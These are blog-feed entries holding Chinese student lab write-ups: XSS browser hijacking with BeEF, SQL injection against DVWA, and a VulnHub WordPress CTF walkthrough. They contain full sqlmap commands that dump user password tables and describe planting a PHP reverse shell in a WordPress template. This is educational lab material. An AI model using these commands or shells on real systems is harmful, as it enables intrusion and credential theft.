<content type="html"><![CDATA[<h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>Lab objectives</h2><p>Understand what XSS is; understand how an XSS attack is carried out and how to defend against XSS; understand the basic principle of SQL injection; master the basic method for accessing a MySQL database from a PHP script; master the basic methods for avoiding SQL injection vulnerabilities in program design; master website configuration.</p><h2 id="系统环境"><a href="#系统环境" class="headerlink" title="系统环境"></a>System environment</h2><p>Kali Linux 2, Windows Server</p><h2 id="网络环境"><a href="#网络环境" class="headerlink" title="网络环境"></a>Network environment</h2><p>Switched network topology</p><h2 id="实验工具"><a href="#实验工具" class="headerlink" title="实验工具"></a>Lab tools</h2><p> Beef; AWVS (Acunetix Web Vulnerability Scanner); SqlMAP; DVWA</p><h2 id="实验步骤"><a href="#实验步骤" class="headerlink" title="实验步骤"></a>Lab steps</h2><h3 id="XSS部分:利用Beef劫持被攻击者客户端浏览器"><a href="#XSS部分:利用Beef劫持被攻击者客户端浏览器" class="headerlink" title="XSS部分:利用Beef劫持被攻击者客户端浏览器"></a>XSS part: using Beef to hijack the victim's client browser</h3><h4 id="实验环境搭建。"><a href="#实验环境搭建。" class="headerlink" title="实验环境搭建。"></a>Setting up the lab environment</h4><p>Role: guestbook website with an XSS vulnerability (built with IIS or Apache, guestbook);<br>Attacker: Kali (uses beEF to generate malicious code and submits it to the guestbook website as a message);<br>Victim: visits the guestbook website and has the browser hijacked.</p><h4 id="搭建GustBook网站"><a href="#搭建GustBook网站" class="headerlink" title="搭建GustBook网站"></a>Setting up the GuestBook website</h4><p>Open Internet Information Services (IIS) Manager from Administrative Tools and create a new website under the Web Sites folder. The site description can be anything, the IP address is the Windows Server's IP, and port 80 is fine. ↓</p><p><img src="https://img-blog.csdnimg.cn/20201216012553878.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p><p>When choosing the path, besides selecting the folder, make sure to <strong>allow anonymous access to the website, otherwise the vulnerability will not be detected</strong>. ↓</p><p><img src="https://img-blog.csdnimg.cn/20201216013153551.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p><p>Grant all permissions. ↓</p><p><img src="https://img-blog.csdnimg.cn/20201216013315669.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p><p>After the site is set up, change the permissions on the site directory: add the Everyone group and set it to Full Control. ↓</p><p><img 
src="https://img-blog.csdnimg.cn/2020121601390350.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p><p><img src="https://img-blog.csdnimg.cn/20201216014308226.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>Then a few small options also need to be changed. ↓</p><p><img src="https://img-blog.csdnimg.cn/20201216014607908.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201216014615927.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h4 id="利用AWVS扫描留言簿网站"><a href="#利用AWVS扫描留言簿网站" class="headerlink" title="利用AWVS扫描留言簿网站"></a>Scanning the guestbook website with AWVS</h4><p>After cracking and opening the software, click "File" – "New" – "Web Site Scan" to launch the Scan Wizard.<br>Enter the URL in Scan single website: ****, and keep clicking Next until the report appears. ↓</p><p><img src="https://img-blog.csdnimg.cn/2020121602051491.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><img src="https://img-blog.csdnimg.cn/20201216020536116.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><img src="https://img-blog.csdnimg.cn/20201216020542261.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><img 
src="https://img-blog.csdnimg.cn/20201216020547270.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>The final results are as follows: there is one XSS vulnerability each in error.asp and add.asp. ↓</p><p><img src="https://img-blog.csdnimg.cn/20201216020902538.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><img src="https://img-blog.csdnimg.cn/20201216020912938.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><img src="https://img-blog.csdnimg.cn/2020121602091967.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h4 id="Kali使用beef生成恶意代码"><a href="#Kali使用beef生成恶意代码" class="headerlink" title="Kali使用beef生成恶意代码"></a>Generating the malicious code with beef on Kali</h4><p>Kali 2020 no longer ships with Beef, so we need to install it ourselves with ↓<br><code>sudo apt-get install beef-xss</code><br>Then change into the directory ↓<br><code>cd /usr/share/beef-xss</code><br>Finally, run <code>./beef</code> and that's it.<br>The first run warns you not to use the default username and password. I forgot to take a screenshot at the time, but the error message is ↓</p><p><img src="https://img-blog.csdnimg.cn/20201216024003548.jpg#pic_center" alt="在这里插入图片描述"></p><p>Edit the file named in the message: <code>sudo vim /etc/beef-xss/config.yaml</code><br>(look up how to use vim yourself)</p><p><img src="https://img-blog.csdnimg.cn/20201216024119857.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p><p>Here I swapped the username and password, saved and exited, then ran <code>./beef</code> again. ↑</p><p><strong>Note</strong></p><p>Starting it as the default user may fail, so we can switch to root and then run <code>./beef</code>. (If you are already running as root, ignore this.)</p><p><img src="https://img-blog.csdnimg.cn/20201216024558503.jpg#pic_center" alt="在这里插入图片描述"><br><img 
src="https://img-blog.csdnimg.cn/20201216024616862.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>The output shows it has started, so I can open <code>http://127.0.0.1:3000/ui/authentication</code> in Firefox on Kali. ↓</p><p><img src="https://img-blog.csdnimg.cn/20201216024727800.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>Enter the username and password set earlier to reach this page. ↓</p><p><img src="https://img-blog.csdnimg.cn/20201216024828390.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>View the XSS script. ↓<br> <img src="https://img-blog.csdnimg.cn/20201216024921793.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>If the other party visits this site, their browser will be hijacked.</p><h4 id="访问http-x2F-x2F-留言簿网站-x2F-message-asp-将恶意代码写入网站留言板"><a href="#访问http-x2F-x2F-留言簿网站-x2F-message-asp-将恶意代码写入网站留言板" class="headerlink" 
src="https://img-blog.csdnimg.cn/20201216040223380.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>Seeing this page, we can say we have succeeded: our HTML code is not visible, which means it has been loaded successfully.</p><p><img src="https://img-blog.csdnimg.cn/20201216040249939.jpg#pic_center" alt="在这里插入图片描述"></p><h4 id="审核用户留言(非严谨)"><a href="#审核用户留言(非严谨)" class="headerlink" title="审核用户留言(非严谨)"></a>Reviewing user messages (not rigorous)</h4><p>Refreshing the page or clicking the home page brings up a pop-up. ↓ (This is equivalent to the administrator reviewing the mail, but my BeEF broke after a few uses, so I did not simulate the administrator review step.)</p><p><img src="https://img-blog.csdnimg.cn/20201216040641124.jpg#pic_center" alt="在这里插入图片描述"></p><p>Back on Kali, information is now pouring in; the part in red keeps repeating, so I won't screenshot it. ↓</p><p><img src="https://img-blog.csdnimg.cn/20201216040742922.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>We can see a lot of information, and we can also do some "work". ↓</p><p><img src="https://img-blog.csdnimg.cn/20201216040817769.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>"Work" ↓</p><p><img src="https://img-blog.csdnimg.cn/20201216040944231.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>Following the arrows, we change the link to the Qingning start page (青柠起始页) and click ==Execute==. ↑</p><p>Then, when we browse the guestbook page, it loads the Qingning start page instead. ↓</p><p><img src="https://img-blog.csdnimg.cn/20201216041127884.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h4 id="实验中XSS攻击属于哪种类型"><a href="#实验中XSS攻击属于哪种类型" class="headerlink" title="实验中XSS攻击属于哪种类型"></a>Which type of XSS attack is used in the experiment</h4><p>The XSS attack in the experiment is an injection-type XSS attack.</p><hr><h3 id="SQL注入部分:DVWA-SQLmap-Mysql注入实战"><a href="#SQL注入部分:DVWA-SQLmap-Mysql注入实战" class="headerlink" 
title="SQL注入部分:DVWA+SQLmap+Mysql注入实战"></a>SQL injection part: DVWA + SQLmap + MySQL injection in practice</h3><p>Set up the lab environment. Start the Metasploitable2 virtual machine.</p><ul><li>A small preparation step: look up the IP on Metasploitable2</li></ul><p>DVWA comes pre-installed on Metasploitable2, so just visit <code>http://Metasploitable的IP/dvw</code> from Kali</p><p><img src="https://img-blog.csdnimg.cn/20201216221018178.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>Set the DVWA Security level to low</p><p><img src="https://img-blog.csdnimg.cn/20201216221232322.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>First, enter 1; the result is as follows. ↓</p><p><img src="https://img-blog.csdnimg.cn/20201216221455186.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>Second, enter 1'; the result is as follows. ↓</p><p><img src="https://img-blog.csdnimg.cn/20201216221708590.jpg#pic_center" alt="在这里插入图片描述"></p><p>The error shows there is a vulnerability to exploit. ↑</p><p>Now use sqlmap; the basic syntax is as follows:</p><ul><li>-u: specify the target URL, i.e. the injection point</li><li>--cookie: the cookie value of the current session</li><li>-b: get the database type by checking the DBMS banner </li><li>--current-db: get the current database </li><li>--current-user: get the user the current database is running as</li><li>--string: a string to match in the page when the query is valid</li><li>--users: enumerate the DBMS users</li><li>--passwords: enumerate the DBMS users' password hashes</li><li>--dbs: enumerate the current databases</li><li>-D database name: specify the database</li><li>--tables: enumerate all tables of the specified database</li><li>-T: specify a table in the database</li><li>--columns: get information about the columns</li><li>-C: enumerate columns in the table</li><li>--dump: dump the table entries</li></ul><h4 id="实验准备"><a href="#实验准备" class="headerlink" title="实验准备"></a>Experiment preparation</h4><p>Use F12 to capture the request and obtain the cookie</p><p>==Note: for every Y/N prompt, just choose Y; for three-way prompts, just press Enter.==</p><h4 id="枚举当前使用的数据库名称和用户名"><a href="#枚举当前使用的数据库名称和用户名" class="headerlink" title="枚举当前使用的数据库名称和用户名"></a>Enumerate the current database name and user name</h4><p>Query the current database name ↓<br><code>sqlmap -u "http://192.168.238.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; 
PHPSESSID=edc3d366bb72538cb8af3df2bbf19979" --current-db</code></p><p><img src="https://img-blog.csdnimg.cn/20201216222823966.jpg#pic_center" alt="在这里插入图片描述"></p><p>Query the user name of the current database user ↓</p><p><code>sqlmap -u "http://192.168.238.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=edc3d366bb72538cb8af3df2bbf19979" --current-user</code></p><p><img src="https://img-blog.csdnimg.cn/20201216222929718.jpg#pic_center" alt="在这里插入图片描述"></p><h4 id="枚举数据库和指定数据库的数据表"><a href="#枚举数据库和指定数据库的数据表" class="headerlink" title="枚举数据库和指定数据库的数据表"></a>Enumerate the databases and the tables of a specified database</h4><p>Enumerate the databases ↓<br><code>sqlmap -u "http://192.168.238.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=edc3d366bb72538cb8af3df2bbf19979" --dbs</code></p><p><img src="https://img-blog.csdnimg.cn/20201216223127796.jpg#pic_center" alt="在这里插入图片描述"></p><p>Enumerate the tables of the specified database ↓<br><code>sqlmap -u "http://192.168.238.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=edc3d366bb72538cb8af3df2bbf19979" -D dvwa --tables</code></p><p><img src="https://img-blog.csdnimg.cn/20201216223001597.jpg#pic_center" alt="在这里插入图片描述"></p><h4 id="获取指定数据库和表中所有列的信息"><a href="#获取指定数据库和表中所有列的信息" class="headerlink" title="获取指定数据库和表中所有列的信息"></a>Get information on all columns of the specified database and table</h4><p><code>sqlmap -u "http://192.168.238.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=edc3d366bb72538cb8af3df2bbf19979" -D dvwa --tables -T users --columns</code></p><p><img src="https://img-blog.csdnimg.cn/20201216223232909.jpg#pic_center" alt="在这里插入图片描述"></p><h4 id="枚举指定数据表中的所有用户名与密码-并down到本地"><a href="#枚举指定数据表中的所有用户名与密码-并down到本地" class="headerlink" title="枚举指定数据表中的所有用户名与密码,并down到本地"></a>Enumerate all user names and passwords in the specified table and dump them locally</h4><p><code>sqlmap -u "http://192.168.238.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=edc3d366bb72538cb8af3df2bbf19979" -D dvwa --tables -T users -C user,password --dump</code></p><p><img 
src="https://img-blog.csdnimg.cn/20201216223304982.jpg#pic_center" alt="在这里插入图片描述"></p>]]></content>
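<summary type="html"><h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>Experiment objectives</h2><p>Understand what XSS is; understand how XSS attacks are carried out and how to defend against them; understand the basic principles of SQL injection; master accessing MySQL databases from PHP scripts</summary>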
<category term="Network Penetration" scheme="http://example.com/categories/Network-Penetration/"/>
<category term="experiment" scheme="http://example.com/tags/experiment/"/>
</entry>
<entry>
<title>CTF Practice</title>
<link href="http://example.com/2020/12/15/CTF%20Practice/"/>
<id>http://example.com/2020/12/15/CTF%20Practice/</id>
<published>2020-12-15T15:11:44.000Z</published>
<updated>2022-03-18T06:03:46.012Z</updated>
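<content type="html"><![CDATA[<h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>Experiment objectives</h2><p>By penetrating the target machine, learn how CTF competitions work and the range of knowledge they cover, such as MISC, PPC and WEB; through practice, strengthen teamwork and acquire basic hands-on CTF and information-gathering skills. Become familiar with tools for network scanning, HTTP web service probing, directory enumeration, privilege escalation, image information extraction, password cracking and so on.</p><h2 id="系统环境"><a href="#系统环境" class="headerlink" title="系统环境"></a>System environment</h2><p>Kali Linux 2; WebDeveloper target machine, source: <a href="https://www.vulnhub.com/">https://www.vulnhub.com/</a> </p><h2 id="实验工具"><a href="#实验工具" class="headerlink" title="实验工具"></a>Tools</h2><p>No restrictions</p><h2 id="实验步骤和内容"><a href="#实验步骤和内容" class="headerlink" title="实验步骤和内容"></a>Experiment steps and content</h2><p>Goal: obtain the flag in the file /root/flag.txt on the Web Developer target machine.<br>Basic approach: live-host scan of the local network segment (netdiscover); network scan (Nmap); browse the HTTP service; enumerate the site's directories (Dirb); find the packet capture file "cap"; analyze the "cap" file to find the username and password of the site's admin back end; exploit a (vulnerable) plugin; use the vulnerability to obtain the server account and password; log in to the server remotely over SSH; an unconventional use of tcpdump.<br>The details are as follows:</p><h3 id="发现目标,找到WebDeveloper的IP地址"><a href="#发现目标,找到WebDeveloper的IP地址" class="headerlink" title="发现目标,找到WebDeveloper的IP地址"></a>Discover the target: find WebDeveloper's IP address</h3><p>A simple <code>nmap -sP</code> command (I won't show how to get the IP; earlier blog posts cover it). As for how to confirm that this is the right IP, apart from eliminating the other IPs, you verify it by visiting the address in a browser.</p><p><img src="https://img-blog.csdnimg.cn/20201215154402907.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="利用NMAP扫描目标主机,发现目标主机端口开放、服务情况"><a href="#利用NMAP扫描目标主机,发现目标主机端口开放、服务情况" class="headerlink" title="利用NMAP扫描目标主机,发现目标主机端口开放、服务情况"></a>Scan the target host with Nmap to find its open ports and services</h3><p>For the scan, I had a sudden idea to try a few variations, so I used three commands:<br>First: <code>nmap</code></p><p><img src="https://img-blog.csdnimg.cn/20201215184238935.jpg#pic_center" alt="在这里插入图片描述"></p><p>Second: <code>nmap -u</code></p><p><img src="https://img-blog.csdnimg.cn/20201215184304191.jpg#pic_center" alt="在这里插入图片描述"></p><p>Third: <code>nmap -sS -sV -TS -A -p-</code></p><p><img 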
src="https://img-blog.csdnimg.cn/20201215184315717.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>Services provided: <strong>ssh</strong> and <strong>http</strong></p><h3 id="若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站"><a href="#若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站" class="headerlink" title="若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站"></a>If the target host provides an HTTP service, try visiting the target site in a browser</h3><p>Nothing much to say; just visit the IP.</p><p><img src="https://img-blog.csdnimg.cn/20201215184801733.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201215184843759.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="利用whatweb探测目标网站使用的CMS模板并分析使用的CMS是什么"><a href="#利用whatweb探测目标网站使用的CMS模板并分析使用的CMS是什么" class="headerlink" title="利用whatweb探测目标网站使用的CMS模板并分析使用的CMS是什么"></a>Use whatweb to probe the CMS template used by the target site and determine which CMS it is</h3><p>Use the command <code>whatweb</code></p><p><img src="https://img-blog.csdnimg.cn/20201215184933344.jpg#pic_center" alt="在这里插入图片描述"></p><p>Note the part underlined in red in the figure, which shows that the CMS template in use is <strong>WordPress</strong>.</p><h3 id="简要说明wpscan功能"><a href="#简要说明wpscan功能" class="headerlink" title="简要说明wpscan功能"></a>A brief description of what wpscan does</h3><p>WPScan is a vulnerability scanner that ships with Kali Linux by default. It is written in Ruby and can scan WordPress sites for many kinds of security vulnerabilities, including theme vulnerabilities, plugin vulnerabilities and vulnerabilities in WordPress itself.<br><a href="https://www.freebuf.com/sectool/174663.html">Details</a></p><h3 id="Dirb-爆破网站使用目录,找到一个似乎和网络流量有关的目录(路径)"><a href="#Dirb-爆破网站使用目录,找到一个似乎和网络流量有关的目录(路径)" class="headerlink" title="Dirb 爆破网站使用目录,找到一个似乎和网络流量有关的目录(路径)"></a>Use Dirb to brute-force the site's directories and find a directory (path) that appears to be related to network traffic</h3><p>Command <code>dirb</code></p><p><img 
src="https://img-blog.csdnimg.cn/20201215203045612.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>Judging by the names <code>ipdata, server-status</code>.</p><h3 id="浏览器访问该目录(路径)"><a href="#浏览器访问该目录(路径)" class="headerlink" title="浏览器访问该目录(路径)"></a>Visit that directory (path) in a browser</h3><p>Visiting the directory leads straight to the cap file!</p><p><img src="https://img-blog.csdnimg.cn/20201215203404162.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center"></p><h3 id="用Wireshark分析该数据包,分析TCP数据流"><a href="#用Wireshark分析该数据包,分析TCP数据流" class="headerlink" title="用Wireshark分析该数据包,分析TCP数据流"></a>Analyze the capture with Wireshark and examine the TCP streams</h3><p>Because operations such as login and registration are sent from the client to the server, we filter with <code>http.request.method == POST</code>, then spot the word <code>login</code> in the <code>Info</code> column, which leads directly to the username and password.</p><p><img src="https://img-blog.csdnimg.cn/20201215205708880.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="利用上一步得到的信息进入网站后台"><a href="#利用上一步得到的信息进入网站后台" class="headerlink" title="利用上一步得到的信息进入网站后台"></a>Use the information from the previous step to enter the site's admin back end</h3><p>Note my link <code>/wp-login.php</code>; after that, just log in.</p><p><img src="https://img-blog.csdnimg.cn/20201215210106360.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="利用该CMS存在的(插件Plugin)漏洞"><a href="#利用该CMS存在的(插件Plugin)漏洞" class="headerlink" title="利用该CMS存在的(插件Plugin)漏洞"></a>Exploit a (plugin) vulnerability in this CMS</h3><p>As for this vulnerability, I did not study it in depth; I only know that having it is enough to cause trouble, heh heh.</p><p><img src="https://img-blog.csdnimg.cn/20201215222415511.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 
id="利用该插件漏洞提权"><a href="#利用该插件漏洞提权" class="headerlink" title="利用该插件漏洞提权"></a>Escalate privileges using the plugin vulnerability</h3><p>Here we use the method of uploading a reverse shell, so we need a page that can run the shell we upload. Before choosing a page, we first download this script, which makes a reverse TCP connection back to the attacker. Download address: <a href="http://pentestmonkey.net/tools/web-shells/php-reverse-shell">http://pentestmonkey.net/tools/web-shells/php-reverse-shell</a></p><p><img src="https://img-blog.csdnimg.cn/20201215212725790.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>After downloading and extracting, it looks like this</p><p><img src="https://img-blog.csdnimg.cn/20201215212746301.jpg#pic_center" alt="在这里插入图片描述"></p><p>This PHP file is what we need, but it still has to be initialized (you can make this change locally or after pasting it into the page; I recommend initializing it locally so that in later experiments you need not redo it every time you copy and paste the code)</p><p><img src="https://img-blog.csdnimg.cn/2020121521300365.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><strong>↑</strong>Change the ip to the attacker's, that is, our own IP; the port number can be anything.</p><p>The preparation is now done, and we can edit the page ↓</p><p>Having logged in in <strong>step 9</strong>, we are in the back end. In the left-hand menu under Appearance→Editor, pick any page; the 404 page is the usual choice ↓</p><p><img src="https://img-blog.csdnimg.cn/202012152116354.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>After pasting the code from the PHP script into the 404 page, clicking Update File (the blue button) below directly produces an error. We then need to make a change: change the edit selection at the top right, then click the button to update the file ↓</p><p><img src="https://img-blog.csdnimg.cn/20201215213331854.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>This is the submission after changing version 27 to 26; it succeeded. ↓</p><p><img src="https://img-blog.csdnimg.cn/20201215213708294.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" 
